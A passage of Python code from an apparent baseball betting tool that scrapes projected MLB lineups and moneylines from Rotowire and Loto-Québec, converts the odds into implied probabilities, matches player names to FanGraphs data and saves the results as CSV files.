= np.array(family_names)\r\n\r\n\t\t#Extract moneylines\r\n\t\tmoneylines = soup.find_all(\"div\", class_ = \"lineup-foot-stat-col\")\r\n\r\n\t\t#Extract the date\r\n\t\ttemp = soup.find(\"span\", class_ = \"hidden-xs-down\").text.split(\" \")[-1].split(\"/\")\r\n\t\tfor i in range(0, len(temp)):\r\n\t\t\tif len(temp[i]) == 1:\r\n\t\t\t\ttemp[i] = \"0\" + temp[i]\r\n\t\tdate = str(2000 + int(temp[2])) + \"-\" + temp[0] + \"-\" + temp[1]\r\n\r\n\r\n\r\n\t\t#Build tables in loop\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\t\tteams = []\r\n\r\n\t\tprint(\"Formating tables ...\")\r\n\r\n\t\tn = int(len(tables) / 2)\r\n\t\tfor i in range(0, n):\r\n\r\n\t\t\t#Get batters\r\n\t\t\tbatters = pd.DataFrame(tables[2*i]).iloc[:,0].copy()\r\n\t\t\tfor j in range(0, len(batters)):\r\n\t\t\t\tbatters[j] = batters[j].split(str(j+1) + \".\")[1].split(\",\")[0].replace(\" \", \"\")\r\n\t\t\t\tk = int(len(batters[j])/2)\r\n\t\t\t\tbatters[j] = batters[j][0:k]\r\n\r\n\t\t\tbatters = pd.DataFrame(batters)\r\n\r\n\t\t\tteam_temp = batters.columns[0].replace(\"Hitters\", \"\").strip()\r\n\t\t\tteams.append(team_temp)\r\n\r\n\t\t\tbatters.columns = [\"Abreviated_Name\"]\r\n\t\t\tbatters[\"Full_Name\"] = \"\"\r\n\r\n\t\t\t#Jr. bug fix\r\n\t\t\tfam = batters[\"Abreviated_Name\"].str.split(\".\", expand = True)\r\n\t\t\tif None in list(fam.iloc[:,-1]):\r\n\t\t\t\tfam.drop(fam.columns[len(fam.columns) - 1], axis = 1, inplace = True)\r\n\r\n\r\n\t\t\tbatters[\"Family_Name\"] = list(fam.iloc[:,-1])\r\n\r\n\t\t\t#Get full names\r\n\t\t\tfor j in range(0, len(batters)):\r\n\t\t\t\tindex = np.where(family_names == batters.at[j, \"Family_Name\"])[0]\r\n\r\n\t\t\t\tif len(index) > 0:\r\n\t\t\t\t\tm = int(index[0])\r\n\t\t\t\t\tbatters.at[j, \"Full_Name\"] = players[m]\r\n\t\t\t\t\tfamily_names = np.delete(family_names, m)\r\n\t\t\t\t\tplayers = np.delete(players, m)\r\n\r\n\r\n\r\n\t\t\tbatters[\"Team\"] = team_temp\r\n\r\n\t\t\tpitchers = pd.DataFrame(tables[2*i + 1]).iloc[0,0].split(\" \")[0].replace(\" \", \"\")\r\n\t\t\tpitchers = pd.DataFrame([pitchers], columns = [\"Abreviated_Name\"])\r\n\r\n\t\t\t#Jr. 
bug fix\r\n\t\t\tfam = pitchers[\"Abreviated_Name\"].str.split(\".\", expand = True)\r\n\t\t\tif None in list(fam.iloc[:,-1]):\r\n\t\t\t\tfam.drop(fam.columns[len(fam.columns) - 1], axis = 1, inplace = True)\t\r\n\r\n\r\n\t\t\tpitchers[\"Family_Name\"] = list(fam.iloc[:,-1])\r\n\t\t\tpitchers[\"Full_Name\"] = \"\"\r\n\r\n\t\t\tindex = np.where(family_names == pitchers.at[0, \"Family_Name\"])[0]\r\n\t\t\tif len(index) > 0:\r\n\t\t\t\tm = int(index[0])\r\n\t\t\t\tpitchers.at[0, \"Full_Name\"] = players[m]\r\n\t\t\t\tfamily_names = np.delete(family_names, m)\r\n\t\t\t\tplayers = np.delete(players, m)\r\n\r\n\t\t\tpitchers[\"Team\"] = team_temp\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = batters\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(batters, ignore_index = True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = pitchers\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(pitchers, ignore_index = True)\r\n\r\n\r\n\r\n\t\tteams = np.array(teams)\r\n\r\n\t\t#Extract moneyline odds \r\n\t\tcurrent_moneylines = []\r\n\r\n\t\tfor i in range(0, int(len(moneylines)/4)):\r\n\r\n\t\t\ttemp = moneylines[4*i].find_all(\"p\", class_ = \"foot-stat-value\")\r\n\r\n\t\t\tfor j in range(0,2):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tcurrent_moneylines.append(int(temp[j].find_all(\"span\")[0].text))\r\n\t\t\t\texcept:\r\n\t\t\t\t\tcurrent_moneylines.append(100)\r\n\r\n\t\tcurrent_moneylines = np.array(current_moneylines)\r\n\r\n\r\n\r\n\t\t#Combine betting data\r\n\t\tindex_home = np.array(list(range(1,len(teams),2))).astype(int)\r\n\t\tindex_away = np.array(list(range(0,len(teams),2))).astype(int)\r\n\r\n\r\n\t\tbetting = pd.DataFrame(np.transpose([teams[index_home], \r\n\t\t\t\t\t\t\t\tcurrent_moneylines[index_home], \r\n\t\t\t\t\t\t\t\tteams[index_away], \r\n\t\t\t\t\t\t\t\tcurrent_moneylines[index_away]]),\r\n\t\t\t\t\t\t\t\tcolumns = [\"Team_Home\", \"MoneyLine_Home\", \"Team_Away\", \"MoneyLine_Away\"])\r\n\r\n\t\tbetting[\"Odds_Home\"] = 1/2\r\n\t\tbetting[\"Odds_Away\"] = 1/2\r\n\r\n\t\tbetting[\"MoneyLine_Home\"] = betting[\"MoneyLine_Home\"].astype(int)\r\n\t\tbetting[\"MoneyLine_Away\"] = betting[\"MoneyLine_Away\"].astype(int)\r\n\r\n\t\tfor i in range(0, len(betting)):\r\n\r\n\t\t\tif betting.at[i, \"MoneyLine_Home\"] >= 0:\r\n\t\t\t\tR = (100 + betting.at[i, \"MoneyLine_Home\"]) / 100\r\n\t\t\telse:\r\n\t\t\t\tR = -(100 - betting.at[i, \"MoneyLine_Home\"]) / betting.at[i, \"MoneyLine_Home\"]\r\n\t\t\t\t\r\n\t\t\tbetting.at[i, \"Odds_Home\"] = 1/R\r\n\r\n\t\t\tif betting.at[i, \"MoneyLine_Away\"] >= 0:\r\n\t\t\t\tR = (100 + betting.at[i, \"MoneyLine_Away\"]) / 100\r\n\t\t\telse:\r\n\t\t\t\tR = -(100 - betting.at[i, \"MoneyLine_Away\"]) / betting.at[i, \"MoneyLine_Away\"]\r\n\t\t\t\t\r\n\t\t\tbetting.at[i, \"Odds_Away\"] = 1/R\t\r\n\r\n\r\n\t\tbetting[\"Returns_Home\"] = 1 / betting[\"Odds_Home\"] - 1\r\n\t\tbetting[\"Returns_Away\"] = 1 / betting[\"Odds_Away\"] - 1\t\t\r\n\r\n\t\tbetting[\"OverOdds\"] = betting[\"Odds_Home\"] + betting[\"Odds_Away\"] - 1\r\n\r\n\r\n\t\t#Add Date\r\n\t\tbat[\"Date\"] = date\r\n\t\tpitch[\"Date\"] = date\r\n\t\tbetting[\"Date\"] = date\r\n\r\n\t\tbat = self.Fix_Team_Names(bat, \"City\")\r\n\t\tpitch = self.Fix_Team_Names(pitch, \"City\")\r\n\t\tbetting = self.Fix_Team_Names(betting, \"City\")\r\n\r\n\r\n\r\n\t\tdef find_name(frame, row, all_names):\r\n\r\n\t\t\tdummy = np.char.lower(all_names)\r\n\r\n\t\t\tf_name = str(frame.at[row, \"Full_Name\"]) + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tindex = np.where(dummy == f_name.lower())[0]\r\n\r\n\t\t\tif len(index) != 
0:\r\n\t\t\t\treturn f_name\r\n\r\n\t\t\tp_name = str(frame.at[row, \"Family_Name\"]) + str(frame.at[row, \"Team\"])\r\n\t\t\tp_name = p_name.lower()\r\n\r\n\t\t\ttemp = str(frame.at[row, \"Family_Name\"])\r\n\t\t\tfamily_name = \"\".join([x for x in temp if x.isalpha()])\r\n\r\n\t\t\tfamily_name = family_name.lower()\r\n\t\t\tteam_name = str(frame.at[row, \"Team\"]).lower()\r\n\r\n\t\t\tm = []\r\n\t\t\tfor i in range(0, len(all_names)):\r\n\t\t\t\ttemp = \"\".join([x for x in dummy[i] if x.isalpha()])\r\n\r\n\t\t\t\tif (family_name in temp) and (team_name in temp):\r\n\t\t\t\t\tm.append(i) \r\n\t\t\t\t\t\r\n\r\n\t\t\tif len(m) == 0:\r\n\t\t\t\treturn \"\"\r\n\r\n\t\t\tout = \"\"\r\n\r\n\t\t\tfor i in m:\r\n\t\t\t\ttemp = [x for x in all_names[i][0:len(all_names[i]) - 3] if x.isupper()]\r\n\t\t\t\tinitials = temp[0] + \".\" \r\n\t\t\t\tabreviated_name = initials + str(frame.at[row, \"Family_Name\"])\r\n\r\n\t\t\t\tif abreviated_name[-2:] == \"Jr\":\r\n\t\t\t\t\tabreviated_name = abreviated_name + \".\"\r\n\r\n\t\t\t\tif abreviated_name == str(frame.at[row, \"Abreviated_Name\"]):\r\n\t\t\t\t\tout = all_names[i]\r\n\t\t\t\t\tbreak\r\n\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"KikeHernandez\":\r\n\t\t\t\treturn \"EnriqueHernandez\" + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"A.Toro-Hernandez\":\r\n\t\t\t\treturn \"AbrahamToro\" + str(frame.at[row, \"Team\"])\t\t\t\t\r\n\r\n\t\t\treturn out\r\n\r\n\r\n\r\n\r\n\t\tprint(\"Matching names (bat) ...\")\r\n\r\n\t\t#Match names with the original database\r\n\t\tpath_check = self.paths[0] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\tbatters = pd.read_csv(path_check)[\"Name\"]\r\n\t\tbatters = np.array(list(set(list(batters))))\r\n\r\n\r\n\t\tbat[\"Name_Key\"] = \"\"\r\n\t\tfor i in tqdm(range(0, len(bat))):\r\n\t\t\tbat.at[i, \"Name_Key\"] = find_name(bat, i, batters)\r\n\r\n\r\n\t\tprint(\"Matching names (pitch) ...\")\r\n\r\n\t\tpath_check = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\tpitchers = pd.read_csv(path_check)[\"Name\"]\r\n\t\tpitchers = np.array(list(set(list(pitchers))))\r\n\r\n\t\tpitch[\"Name_Key\"] = \"\"\r\n\t\tfor i in tqdm(range(0, len(pitch))):\r\n\t\t\tpitch.at[i, \"Name_Key\"] = find_name(pitch, i, pitchers)\r\n\r\n\r\n\r\n\t\tprint(\"Saving ...\")\r\n\r\n\t\t#Save\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tos.mkdir(path_check)\r\n\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + date \r\n\t\tif not path.exists(path_check):\r\n\t\t\tos.mkdir(path_check)\r\n\r\n\t\tbat.to_csv(path_check + \"/Bat.csv\", index = False)\r\n\t\tpitch.to_csv(path_check + \"/Pitch.csv\", index = False)\r\n\t\tbetting.to_csv(path_check + \"/Moneyline.csv\", index = False)\r\n\r\n\t\tprint(\"Data avaible at: \" + \"\\t\" + path_check)\r\n\r\n\r\n\r\n\r\n\tdef Merge_Predicted_Lineups(self):\r\n\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing directory at:\" + \"\\t\" + path_check)\r\n\r\n\t\tfiles_ext = [x for x in os.listdir(path_check) if \"-\" in x]\r\n\t\tif len(files_ext) == 0:\r\n\t\t\tsys.exit(\"No files to process:\" + \"\\t\" + path_check)\r\n\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\t\tmoneylines = []\r\n\r\n\t\tfor ext in 
files_ext:\r\n\r\n\t\t\tpath_load = path_check + \"/\" + ext\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = pd.read_csv(path_load + \"/Bat.csv\")\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(pd.read_csv(path_load + \"/Bat.csv\"), ignore_index=True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = pd.read_csv(path_load + \"/Pitch.csv\")\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(pd.read_csv(path_load + \"/Pitch.csv\"), ignore_index=True)\t\t\r\n\r\n\t\t\tif len(moneylines) == 0:\r\n\t\t\t\tmoneylines = pd.read_csv(path_load + \"/Moneyline.csv\")\r\n\t\t\telse:\r\n\t\t\t\tmoneylines = moneylines.append(pd.read_csv(path_load + \"/Moneyline.csv\"), ignore_index=True)\r\n\r\n\t\tdef find_name(frame, row, all_names):\r\n\r\n\t\t\tdummy = np.char.lower(all_names)\r\n\r\n\t\t\tf_name = str(frame.at[row, \"Full_Name\"]) + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tindex = np.where(dummy == f_name.lower())[0]\r\n\r\n\t\t\tif len(index) != 0:\r\n\t\t\t\treturn f_name\r\n\r\n\t\t\tp_name = str(frame.at[row, \"Family_Name\"]) + str(frame.at[row, \"Team\"])\r\n\t\t\tp_name = p_name.lower()\r\n\r\n\t\t\ttemp = str(frame.at[row, \"Family_Name\"])\r\n\t\t\tfamily_name = \"\".join([x for x in temp if x.isalpha()])\r\n\r\n\t\t\tfamily_name = family_name.lower()\r\n\t\t\tteam_name = str(frame.at[row, \"Team\"]).lower()\r\n\r\n\t\t\tm = []\r\n\t\t\tfor i in range(0, len(all_names)):\r\n\t\t\t\ttemp = \"\".join([x for x in dummy[i] if x.isalpha()])\r\n\r\n\t\t\t\tif (family_name in temp) and (team_name in temp):\r\n\t\t\t\t\tm.append(i) \r\n\t\t\t\t\t\r\n\r\n\t\t\tif len(m) == 0:\r\n\t\t\t\treturn \"\"\r\n\r\n\t\t\tout = \"\"\r\n\r\n\t\t\tfor i in m:\r\n\t\t\t\ttemp = [x for x in all_names[i][0:len(all_names[i]) - 3] if x.isupper()]\r\n\t\t\t\tinitials = temp[0] + \".\" \r\n\t\t\t\tabreviated_name = initials + str(frame.at[row, \"Family_Name\"])\r\n\r\n\t\t\t\tif abreviated_name[-2:] == \"Jr\":\r\n\t\t\t\t\tabreviated_name = abreviated_name + \".\"\r\n\r\n\t\t\t\tif abreviated_name == str(frame.at[row, \"Abreviated_Name\"]):\r\n\t\t\t\t\tout = all_names[i]\r\n\t\t\t\t\tbreak\r\n\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"KikeHernandez\":\r\n\t\t\t\treturn \"EnriqueHernandez\" + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"A.Toro-Hernandez\":\r\n\t\t\t\treturn \"AbrahamToro\" + str(frame.at[row, \"Team\"])\t\t\t\t\r\n\r\n\t\t\treturn out\r\n\r\n\r\n\r\n\t\t#Find missing names\r\n\t\tbat_na = np.where(bat[\"Name_Key\"].isnull())[0]\r\n\t\tif len(bat_na) > 0:\r\n\r\n\t\t\tpath_check = self.paths[0] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\t\tbatters = pd.read_csv(path_check)[\"Name\"]\r\n\t\t\tbatters = np.array(list(set(list(batters))))\r\n\r\n\t\t\tfor i in tqdm(bat_na):\r\n\t\t\t\tbat.at[i, \"Name_Key\"] = find_name(bat, i, batters) \r\n\r\n\r\n\r\n\t\tpitch_na = np.where(pitch[\"Name_Key\"].isnull())[0]\r\n\t\tif len(pitch_na) > 0:\r\n\r\n\t\t\tpath_check = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\t\tpitchers = pd.read_csv(path_check)[\"Name\"]\r\n\t\t\tpitchers = np.array(list(set(list(pitchers))))\t\r\n\r\n\t\t\tfor i in tqdm(pitch_na):\r\n\t\t\t\tpitch.at[i, \"Name_Key\"] = find_name(pitch, i, pitchers) \r\n\r\n\r\n\r\n\t\tpath_save = self.paths[3] + \"/Predicted_Lineups\"\r\n\t\tbat.to_csv(path_save + \"/All_Batters.csv\", index = False)\r\n\t\tpitch.to_csv(path_save + \"/All_Pitchers.csv\", index = False)\r\n\t\tmoneylines.to_csv(path_save + \"/All_Moneylines.csv\", index = False)\r\n\r\n\r\n\r\n\r\n\tdef 
Billet_Loto_Quebec(self):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + date + \"/Billet.csv\" \r\n\t\tif path.exists(path_check):\r\n\t\t\tsys.exit(\"Forbiden: Cannot overwrite Billet.csv ---- File is final.\")\r\n\r\n\t\turl = \"https://miseojeu.lotoquebec.com/fr/offre-de-paris/baseball/mlb/matchs?idAct=11\"\r\n\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tprint(\"Accessing Loto-Quebec website...\")\r\n\r\n\t\t#Obtain page data\r\n\t\thtml = requests.get(url , stream = True, headers = headers).content\r\n\t\ttry:\r\n\t\t\ttables = pd.read_html(html)\r\n\t\t\tsoup = BeautifulSoup(html)\r\n\t\texcept:\r\n\t\t\tsys.exit(\"Error: No bets found ---- Too early, or no games today.\")\r\n\r\n\t\t#Obtain moneylines\r\n\t\tmoneylines = [x for x in tables if len(x.columns) == 4]\r\n\t\tmoneylines = [x for x in moneylines if \"Baseball MLB\" in x.iloc[0,1]]\r\n\r\n\t\tbillet = pd.DataFrame([moneylines[0].iloc[0,1], moneylines[0].iloc[0,2]]).T\r\n\r\n\t\tfor x in moneylines[1:]:\r\n\t\t\ttemp = pd.DataFrame([x.iloc[0,1], x.iloc[0,2]]).T\r\n\r\n\t\t\tif \"pt(s)\" in temp.iloc[0,0]:\r\n\t\t\t\tbreak\r\n\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tbillet = billet.append(temp, ignore_index = True)\r\n\r\n\t\tbillet.columns = [\"Home\", \"Away\"]\r\n\r\n\t\tteams = []\r\n\t\treturns = []\r\n\r\n\t\tfor j in range(0, 2):\r\n\r\n\t\t\ttemp = billet.iloc[:,j]\r\n\t\t\tnm = temp.str.split(\" \")\r\n\r\n\t\t\tt = []\r\n\t\t\tr = []\r\n\t\t\tfor i in range(0, len(temp)):\r\n\r\n\t\t\t\tt.append(nm[i][2])\r\n\t\t\t\tr.append(float(nm[i][3].replace(\",\", \".\")))\r\n\r\n\r\n\t\t\tteams.append(t)\r\n\t\t\treturns.append(r)\r\n\r\n\r\n\t\tout = pd.DataFrame([teams[1], returns[1], teams[0], returns[0]]).T\r\n\t\tout.columns = [\"Team_Home\", \"Factor_Home\", \"Team_Away\", \"Factor_Away\"]\r\n\t\tout[\"Date\"] = str(datetime.now()).split(\" \")[0]\r\n\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + out[\"Date\"][0] \r\n\t\tif not path.exists(path_check):\r\n\t\t\tos.mkdir(path_check)\r\n\r\n\t\tout.to_csv(path_check + \"/Billet.csv\", index = False)\r\n\r\n\t\tprint(\"Done.\")\r\n\r\n\r\n\r\n\tdef Ajouter_Lineups(self):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + date\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Aucun Billet.\")\r\n\r\n\t\tbillet = pd.read_csv(path_check + \"/Billet.csv\")\r\n\t\toriginal = billet[[\"Team_Home\", \"Team_Away\"]].copy()\r\n\t\toriginal.columns = [\"LotoQ_Symbol_Home\", \"LotoQ_Symbol_Away\"]\r\n\t\tbillet = billet.join(original)\r\n\r\n\t\t#Translate team names\r\n\t\tbillet = self.Fix_Team_Names(billet, \"City\")\r\n\r\n\t\t#Attempt to obtain predicted lineups\r\n\t\turl = \"https://www.rotowire.com/baseball/daily-lineups.php\"\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tprint(\"Accessing: \" + url + \" ...\")\r\n\r\n\t\t#Extract projected roosters\r\n\t\thtml = requests.get(url, headers = headers).content\r\n\t\tsoup = BeautifulSoup(html)\r\n\r\n\t\t#Extract the rooster html object\r\n\t\ttables = soup.find_all(\"div\", class_ = \"lineup__box\")\r\n\t\t#Filter 
garbage\r\n\t\ttables = [x for x in tables if len(x.find_all(\"div\", class_ = \"lineup__abbr\")) == 2 and len(x.find_all(\"li\", {\"class\" : \"lineup__status\"})) == 2]\r\n\r\n\t\tif len(tables) == 0:\r\n\t\t\tsys.exit(\"No predicted lineups found.\")\r\n\r\n\t\tprint(str(len(tables)) + \" Lineups found...\")\r\n\r\n\t\t#Initialize containers\r\n\t\tteams = []\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\r\n\t\t#Retrieve data\r\n\t\tID = 0\r\n\t\tfor x in tables:\r\n\r\n\t\t\tframe_bat = pd.DataFrame(index = np.arange(0,9), \r\n\t\t\t\t\t\t\t\t\t\tcolumns = [\"Batter_Home\", \"Batter_Away\"])\r\n\r\n\t\t\tframe_pitch = pd.DataFrame(index = np.arange(0,1), \r\n\t\t\t\t\t\t\t\t\t\tcolumns = [\"Pitcher_Home\", \"Pitcher_Away\"])\t\r\n\r\n\t\t\tframe_team = pd.DataFrame(index = np.arange(0,1), \r\n\t\t\t\t\t\t\t\t\t\tcolumns = [\"Team_Home\", \"Team_Away\"])\t\t\t\t\r\n\r\n\t\t\thome = x.find(\"ul\", class_ = \"lineup__list is-home\")\r\n\t\t\taway = x.find(\"ul\", class_ = \"lineup__list is-visit\")\r\n\r\n\t\t\tdata = [home, away]\r\n\r\n\t\t\tfor i in range(0,2):\r\n\r\n\t\t\t\t#Batter names\r\n\t\t\t\tbatters = data[i].find_all(\"li\", class_ = \"lineup__player\")\r\n\t\t\t\tfor j in range(0, len(batters)):\r\n\t\t\t\t\tframe_bat.iloc[j,i] = batters[j].text.split(\"\\n\")[2]\r\n\r\n\t\t\t\t#Starting pitcher names\r\n\t\t\t\tpitchers = data[i].find(\"div\", class_ = \"lineup__player-highlight-name\").text.split(\"\\n\")[1]\r\n\t\t\t\tframe_pitch.iloc[0,i] = pitchers\r\n\r\n\r\n\t\t\t#Teams\r\n\t\t\tframe_team.iloc[0,0] = x.find(\"div\", class_ = \"lineup__team is-home\").text.split(\"\\n\")[2]\r\n\t\t\tframe_team.iloc[0,1] = x.find(\"div\", class_ = \"lineup__team is-visit\").text.split(\"\\n\")[2]\r\n\r\n\t\t\tframe_bat[\"Team_Home\"] = str(frame_team.iloc[0,0])\r\n\t\t\tframe_bat[\"Team_Away\"] = str(frame_team.iloc[0,1])\r\n\r\n\t\t\tframe_pitch[\"Team_Home\"] = str(frame_team.iloc[0,0])\r\n\t\t\tframe_pitch[\"Team_Away\"] = str(frame_team.iloc[0,1])\r\n\r\n\t\t\t\r\n\t\t\t#Tag matches\r\n\t\t\tframe_team[\"ID\"] = ID\r\n\t\t\tframe_bat[\"ID\"] = ID\r\n\t\t\tframe_pitch[\"ID\"] = ID\r\n\r\n\t\t\t#Update ID\r\n\t\t\tID += 1\r\n\r\n\t\t\t#####\r\n\t\t\t#CHECK IF THE LINEUP ARE EXPECTED OR CONFIRMED\r\n\t\t\tstatus = x.find_all(\"li\", {\"class\" : \"lineup__status\"})\r\n\r\n\t\t\tframe_team[\"Lineup_Away\"] = status[0][\"class\"][-1]\r\n\t\t\tframe_bat[\"Lineup_Away\"] = status[0][\"class\"][-1]\r\n\t\t\tframe_pitch[\"Lineup_Away\"] = status[0][\"class\"][-1]\t\r\n\r\n\r\n\r\n\t\t\tframe_team[\"Lineup_Home\"] = status[1][\"class\"][-1]\r\n\t\t\tframe_bat[\"Lineup_Home\"] = status[1][\"class\"][-1]\r\n\t\t\tframe_pitch[\"Lineup_Home\"] = status[1][\"class\"][-1]\t\t\t\r\n\r\n\r\n\t\t\t#Append results\r\n\t\t\tif len(teams) == 0:\r\n\t\t\t\tteams = frame_team\r\n\t\t\telse:\r\n\t\t\t\tteams = teams.append(frame_team, ignore_index = True)\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = frame_bat\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(frame_bat, ignore_index = True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = frame_pitch\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(frame_pitch, ignore_index = True)\t\t\t\r\n\r\n\r\n\t\t#Fix team names\r\n\t\tteams = self.Fix_Team_Names(teams, \"City\")\r\n\t\tbat = self.Fix_Team_Names(bat, \"City\")\r\n\t\tpitch = self.Fix_Team_Names(pitch, \"City\")\r\n\r\n\t\tprint(teams)\r\n\r\n\r\n\t\t#Fix player names\r\n\t\tprint(\"Translating names to FanGraph values ...\")\r\n\r\n\t\tpath_check = self.paths[0] + 
\"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tbatters = pd.read_csv(path_check)[\"Name\"]\r\n\t\tbatters = np.array(list(set(list(batters))))\r\n\r\n\t\tpath_check = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tpitchers = pd.read_csv(path_check)[\"Name\"]\r\n\t\tpitchers = np.array(list(set(list(pitchers))))\r\n\r\n\r\n\t\tdef find_name(name, team, all_names):\r\n\r\n\t\t\tcurrent = \"None\"\r\n\r\n\t\t\tdummy = np.char.lower(all_names)\r\n\r\n\t\t\tfamily_name = name.split(\" \")[-1]\r\n\t\t\tfirst_letter = name[0]\r\n\r\n\t\t\twhile True:\r\n\r\n\t\t\t\t#First Search\r\n\t\t\t\tsearch_val = (name.replace(\" \", \"\") + team).lower()\r\n\t\t\t\tmatches = np.where(dummy == search_val)[0]\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\t\t#Second search, by family name\r\n\t\t\t\tsearch_val = (family_name + team).lower()\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in dummy[i]:\r\n\t\t\t\t\t\tmatches.append(i)\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\t\t#Third search, with no alphanumerics\r\n\t\t\t\tsearch_val = \"\".join([x for x in search_val if x.isalpha()])\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\r\n\t\t\t\t#Added: family name, no team\r\n\t\t\t\tsearch_val = (family_name).lower()\t\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\t\t\t\t\t\r\n\r\n\r\n\t\t\t\t#Added: search for junior\r\n\t\t\t\tsearch_val = (family_name + \"jr\").lower()\t\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\r\n\r\n\t\t\t\t#Alternative search, with possible 2nd family name\r\n\t\t\t\tfamily_name = name.split(\" \")[-2]\r\n\r\n\t\t\t\t#3rd search, by family name\r\n\t\t\t\tsearch_val = (family_name + team).lower()\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in dummy[i]:\r\n\t\t\t\t\t\tmatches.append(i)\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\t\t\t\t#4th, with no alphanumerics\r\n\t\t\t\tsearch_val = \"\".join([x for x in search_val if x.isalpha()])\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\t\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\t\t\t\tbreak\r\n\r\n\r\n\t\t\tif len(matches) > 0:\r\n\t\t\t\tfor i in matches:\r\n\t\t\t\t\tif all_names[i][0] == first_letter and all_names[i][-3:] == team:\r\n\t\t\t\t\t\tcurrent = all_names[i]\r\n\r\n\t\t\treturn current\r\n\r\n\r\n\t\t#Initialize copies, esier to test on...\r\n\t\tfangraph_bat = bat.copy()\r\n\t\tfangraph_pitch = pitch.copy()\r\n\r\n\t\tfor j in tqdm(range(0, len(bat))):\r\n\t\t\tfangraph_bat.iloc[j, 0] = find_name(bat.at[j, \"Batter_Home\"], bat.at[j, \"Team_Home\"], batters)\r\n\t\t\tfangraph_bat.iloc[j, 1] = find_name(bat.at[j, \"Batter_Away\"], bat.at[j, \"Team_Away\"], batters)\r\n\r\n\t\tfor j in tqdm(range(0, 
